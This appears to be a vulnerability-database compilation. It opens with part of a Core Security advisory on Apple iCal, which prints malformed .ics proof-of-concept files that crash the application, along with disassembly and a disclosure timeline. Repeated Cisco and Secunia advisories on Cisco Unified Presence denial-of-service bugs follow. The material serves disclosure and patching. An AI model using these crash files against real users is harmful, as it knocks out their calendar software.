X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:4
DTSTART;TZID=America/Buenos_Aires:20071225T110000
DURATION:PT1H
UID:48878014-5F03-43E5-8639-61E708714F9A
DTSTAMP:20071213T130632Z
SUMMARY:Vuln
CREATED:20071213T130611Z
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
END:VEVENT
END:VCALENDAR
- -----------/
Analysis of the vulnerability
The above proof-of-concept file creates new events in the iCal
application . When a user double-clicks on these events the program
crashes writing in the memory pointed by pointer 'EDI=0'. Only the value
of 'EAX' is under control, must be less than '0x7fffffff' and is
extracted from the following line of the PoC '.ics' file.
/-----------
RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646 (0x7FFFFFFE)
- -----------/
/-----------
__text:0013C178 push ebp
__text:0013C179 mov ebp, esp
__text:0013C17B sub esp, 38h
__text:0013C17E mov eax, ds:off_1F435C
__text:0013C183 mov [ebp+var_4], edi
__text:0013C186 mov edi, [ebp+arg_C]
__text:0013C189 mov [ebp+var_8], esi
__text:0013C18C mov esi, [ebp+arg_8]
__text:0013C18F mov [ebp+var_C], ebx
__text:0013C192 mov [esp+38h+var_34], eax
__text:0013C196 mov eax, [ebp+arg_0]
__text:0013C199 mov [esp+38h+var_28], 0
__text:0013C1A1 mov [esp+38h+var_2C], 0
- -----------/
Here is written on '[ebp + var28]' and '[ebp + var2C]' and because
'EBP' is 'ESP' minus '0x38', this is similar to
/-----------
[ebp + var28] = [esp+0x38+var_28]
[ebp + var2C] = [esp+0x38+var_2C]
- -----------/
There are located the null-pointers on the stack.
/-----------
BFFFEF7C var_2C dd 0
BFFFEF80 var_28 dd 0
- -----------/
Upon reaching the function where the crash occurs.
/-----------
__text:0014ADC3 push ebp
__text:0014ADC4 mov ebp, esp
__text:0014ADC6 sub esp, 48h
__text:0014ADC9 mov eax, ds:stru_1FA2A0.superclass
- -----------/
Logically the zeros are still present because don't work with those
values until we enter.
/-----------
BFFFEF7C arg_C dd 0
BFFFEF80 arg_10 dd 0
- -----------/
We see that the function argument 'arg_C' is loaded and moved to 'EDI'.
/-----------
0014ADE0 mov edi, [ebp+arg_C]
- -----------/
And this is the location where is written at the moment of crashing
further ahead, meaning that it is a zero that can't be changed.
/-----------
0014AE2F mov dword ptr [edi], 0
- -----------/
When getting closer to the point of crash because we control 'EAX' and
we can trigger a jump after comparing with '[ebx+0Ch]' and '[ebx+08h]'.
/-----------
0014AE20 cmp eax, [ebx+0Ch] (if it is lower than 1)
0014AE23 jl short loc_14AE2F
0014AE25 cmp eax, [ebx+8] (if it is lower than 0x270F)
0014AE2D jle short loc_14AE37
169280B8 dd 270Fh (ebx+08)
169280BC dd 1 (ebx+0C)
- -----------/
The first comparison for 'JL' doesn't avoid the crash zone, but anyway
negative numbers can't be inserted by default and a zero value does not
crash the program or even gets it near the critical zone. Any other
value crashes the application when writing in the null location.
In the other case a comparison is made such that if 'EAX' is less than
'0x270f' the crash zone is avoided and the program continues to work
without problem. Negative values are not read and if a value greater
than '0x7fffffff' the maximum value is used instead.
The corresponding PoC follows. to trigger the bug import a .ics file
with the following content then click on the 65535 on edit mode and
accept it without changes.
/-----------
BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
- -----------/
3) Improper resource liberation (Bugtraq ID 28633, CVE-2008-2007)
This is another case of bad validation of a file with the iCalendar
format that results in a more serious bug.
A vulnerable .ics file will contain the following line:
/-----------
ATTACH;VALUE=URI:S=osumi
- -----------/
The corresponding PoC follows. Double-click on the .ics file with the
following content, an event will be created. To crash iCal click on the
newly created event and the on the alarm sound list.
/-----------
BEGIN:VCALENDAR
X-WR-TIMEZONE:America/Buenos_Aires
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
X-WR-CALNAME:evento falso
VERSION:2.0
X-WR-RELCALID:71CE8EAD-380B-4EA3-A123-60F9B2A03990
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:11
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T143420Z
SUMMARY:evento falso
DTEND;TZID=America/Buenos_Aires:20071225T010000
LOCATION:donde se hace
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
TRANSP:OPAQUE
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
URL;VALUE=URI:http://pepe.com:443/pepe
ATTACH;FMTTYPE=text/php;X-APPLE-CACHED=1:ical://attachments/4E3646DE-ED2
0-449C-88E7-744E62BC8C12/651D31BE-455E-45ED-99C6-55B9F03A3FA9/popote.php
CREATED:20071213T142720Z
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT15H
END:VALARM
BEGIN:VALARM
X-WR-ALARMUID:F54A0E05-57B8-4562-8E77-056B19305CD0
ACTION:AUDIO
TRIGGER:-PT15M
ATTACH;VALUE=URI:S=osumi
END:VALARM
END:VEVENT
END:VCALENDAR
- -----------/
*Report Timeline*
. 2008-01-30:
Core sends an initial notification that vulnerabilities were
discovered in the iCal application and iCal server and that an advisory
draft is available. 2008-01-31:
Vendor acknowledges and requests the draft. 2008-01-31:
Core sends the draft, including proof-of-concept files that trigger
the bugs. 2008-02-12:
Core requests update info on the vulnerabilities and states that
wants to coordinate the date of the disclosure. 2008-02-18:
Core requests update info on the vulnerabilities. 2008-02-18:
Vendor replies that the iCal Server (CVE-2008-1000) vulnerability is
tracked for a fix in an upcoming update and the vulnerabilities in the
iCal client application will be fixed in an update following the early
March software update. 2008-02-19:
Core indicated that it will split the report in two security advisories.
CORE-2008-0123 will address the vulnerability in iCal server
(CVE-2008-1000) and will be published in coordination with the release
of the vendor's March software update. The publication date for the
second advisory, will dealt bydealing with the three vulnerabilities in
the iCal client application will be coordinated for a date after the
March update unless there are clear indications of the vulnerability
being exploited in the wild, in which case if Core considers that the
information provided in the advisory would help end users to decide how
to react the advisory would be published sooner as a "forced release". 2008-03-03:
Core requests update info on the vulnerability, a concrete release
schedule and text for the advisory section called "Vendor Information,
Solutions and Workarounds". 2008-03-04:
Vendor provides information concerning CVE-2008-1000 and indicates
that the bug is in the Wiki server and not the iCal Server. 2008-03-13:
Core re-schedules the publication to March 24th and requests the vendor
an update on the coordinated date of disclosure. The remaining three
vulnerabilities in the iCal client application will be dealt by a second
security advisory (CORE-2008-0126) to be published after the release of
the March software update. Publication of CORE-2008-0126 is initially
slated for March 24th 2008 but the final date estimation can be
discussed further with the vendor based on its estimated date for fixes. 2008-03-18:
APPLE-SA-2008-0318 software update released. 2008-03-18:
CORE-2008-0123 is published. 2008-03-18:
Vendor informs that will track the first two issues as crasher-only
bugs but still intends to address them. Further details to determine if
the null pointer de-reference bugs are exploitable are requested. The
vendor will continue to track the third as a security bug and estimates
early April for the release of the software update that fix them.
Additional timing information will be provided closer to the estimated date. 2008-03-18:
Core re-schedules the publication to April 7th and indicates that
should any new details about the vulnerabilities become available they
will be forwarded to the vendor. 2008-04-04:
Core requests a more precise date of release of the fixes to coordinate
the publication and recommends the vendor to consider the three as
security bugs because it couldn't be proved that in this case the
integer overflows can't be exploited. 2008-04-07:
Vendor requests that Core to postpone the advisory publication until
the fix is available. 2008-04-07:
Core requests a more precise date of release of the fixes to coordinate
the new publication date. 2008-04-07:
Vendor informs that the estimated date for the update is near the end
of April. 2008-04-08:
Core confirms that coordinating the publication of CORE-2008-0126 for
April 28th is acceptable. 2008-04-16:
Core requests an update on the release date of the fixes. 2008-04-17: Vendor states that end of April is still the estimated
date and provides more details that explain why the first two bugs are
been considered null-pointer dereference bugs only. A value range
verification is performed and out-of-range values branch execution flow
to instructions that assign NULL to a pointer which later triggers a
null pointer de-reference that causes the application to crash. the root
cause of the crash is a NULL pointer de-reference and not an integer
overflow. 2008-04-17:
Core confirms that the two first bugs can be considered crashes due to
null-pointer dereference. Upon further research it is confirmed that
integer overflows are detected and do not cause the actual crashes. 2008-04-17:
Vendor asks confirmation that the first two bugs have no security
related consequences. 2008-04-17:
Core responds that the three bugs still have security related
consequences. The first two bugs can be abuse to execute denial of
service attacks by untrusted and unauthenticated third parties
specifically using public server as attack vector. Core considers bug
that allow unauthenticated third parties to be security vulnerabilities.
Core indicates that exploitation of null pointer de-reference bugs
cannot be ruled out generically, a statement which could be derived from
Rice's theorem. 2008-04-25: Core requests an update on the release date of the fixes
and sends detailed information on the analysis of the first bug. 2008-04-27: Vendor estimates early May as the date of the software
fixes release. 2008-05-05: Core informs the vendor that it's re-scheduling the
publication to May 12th as a final date unless precise information is
given on the release date of the fixes. 2008-05-06: Vendor responds precising that the fixes are being
released sometime the following week. 2008-05-07: Core states that it is not willing to re-schedule
publication date unless the vendor commits to a concrete date. 2008-05-10: Vendor asks Core not to publish the advisory before Apple
security update is available. Vendor indicates that fixes will be
released on May 19th, 2008. 2008-05-10: Given that the vendor has communicated a concrete date,
Core will discuss re-scheduling (for the fifth time) the publication
date of the advisory. 2008-05-12: Core communicates the vendor that the publication of the
advisory is re-scheduled to May 21th, that date is final. 2008-05-14: Vendor acknowledges reception of the last email and
appreciates that Core posponed the advisory publication date. 2008-05-20: Core send the final draft of the advisory to the vendor. 2008-05-21:
An edited and corrected final version of the advisory is sent to the
vendor. 2008-05-21: Advisory CORE-2008-0126 is published.
*References*
[1]
RFC 2445: Internet Calendaring and Scheduling Core Object
Specification (iCalendar) - http://tools.ietf.org/html/rfc2445
[2] RFC 4791: Calendaring Extensions to WebDAV -
http://tools.ietf.org/html/rfc4791
[3] http://www.apple.com/downloads/macosx/calendars/
[4] iCalShare http://icalshare.com/
[5] iCalWorld http://www.icalworld.com/
*About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs/.
*About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.
*Disclaimer*
The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.
*GPG/PGP Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFINH0iyNibggitWa0RAtdmAKCf4V+tks7RBYRRa2Bp9IT3LjBoQgCfeff8
PZO21gkXaFO1pAdxuViw2ys=
=xZCy
-----END PGP SIGNATURE-----
| VAR-200805-0197 | CVE-2008-1158 | Cisco Unified Presence Engine Service In IP Service disruption due to packets (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via malformed packets, aka Bug ID CSCsh50164. Denial of service due to packets intentionally created by a remote attacker (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsh50164 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to crash the affected device, denying service to legitimate users. The CISCO AKA number is CSCsh50164. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
The vulnerabilities affect version 1.0.
SOLUTION:
Upgrade to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-200805-0204 | CVE-2008-1740 | Cisco Unified Presence Engine Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The Presence Engine (PE) service in Cisco Unified Presence before 6.0(1) allows remote attackers to cause a denial of service (core dump and service interruption) via an unspecified "stress test," aka Bug ID CSCsh20972. Details unknown to remote attacker 'stress test,' Through service disruption (DoS) There is a possibility of being put into a state. The problem is Bug ID : CSCsh20972 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to cause the affected application to crash, denying service to legitimate users.
These vulnerabilities were discovered internally by Cisco, and there
are no workarounds.
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml. The software version
can be determined by running the command show version active via the
Command Line Interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Presence collects information about a user's
availability status and communications capabilities. Using
information captured by Cisco Unified Presence, applications such as
Cisco Unified Personal Communicator and Cisco Unified Communications
Manager can improve productivity by helping users connect with
colleagues more efficiently by determining the most effective means
for collaborative communication. There are no workarounds for these
vulnerabilities. There is no workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsh50164 - PE Service core dumps when it receives malformed packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsh20972 - PE Service core dumps under stress test
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj64533 - SIPD service core dumps during TCP port scan
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of any of the vulnerabilities may result in
the interruption of presence services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Fixes for all the vulnerabilities listed in this advisory are
included in Cisco Unified Presence version 6.0(3) that is available
at the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were internally discovered by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw1+86n/Gc8U/uARAlunAJ9UTjai8ZofKwUcH7B3CqyBetjIDwCdHgUI
91czchLkcIoB9pmUP9zWEI0=
=gkID
-----END PGP SIGNATURE-----
. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
SOLUTION:
Upgrade to version 6.0(3).
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor
| VAR-200805-0205 | CVE-2008-1741 | Cisco Unified Presence SIP Proxy Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SIP Proxy (SIPD) service in Cisco Unified Presence before 6.0(3) allows remote attackers to cause a denial of service (core dump and service interruption) via a TCP port scan, aka Bug ID CSCsj64533. The problem is Bug ID : CSCsj64533 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
An attacker can exploit this issue to cause denial-of-service conditions for legitimate users.
These vulnerabilities were discovered internally by Cisco, and there
are no workarounds.
Cisco has released free software updates that address these
vulnerabilities.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cup.shtml.
Administrators of systems running all Cisco Unified Presence versions
can determine the software version by viewing the main page of the
Cisco Unified Presence Administration interface. The software version
can be determined by running the command show version active via the
Command Line Interface (CLI).
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
Cisco Unified Presence collects information about a user's
availability status and communications capabilities. Using
information captured by Cisco Unified Presence, applications such as
Cisco Unified Personal Communicator and Cisco Unified Communications
Manager can improve productivity by helping users connect with
colleagues more efficiently by determining the most effective means
for collaborative communication. There are no workarounds for these
vulnerabilities. Cisco Unified Presence version 6.0(1) is the
upgrade path for Cisco Unified Presence version 1.0. There is no workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsh50164 - PE Service core dumps when it receives malformed packets
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsh20972 - PE Service core dumps under stress test
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj64533 - SIPD service core dumps during TCP port scan
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of any of the vulnerabilities may result in
the interruption of presence services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Fixes for all the vulnerabilities listed in this advisory are
included in Cisco Unified Presence version 6.0(3) that is available
at the following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/cup-60?psrtdcat20e2
Workarounds
===========
There are no workarounds for these vulnerabilities.
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
These vulnerabilities were internally discovered by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
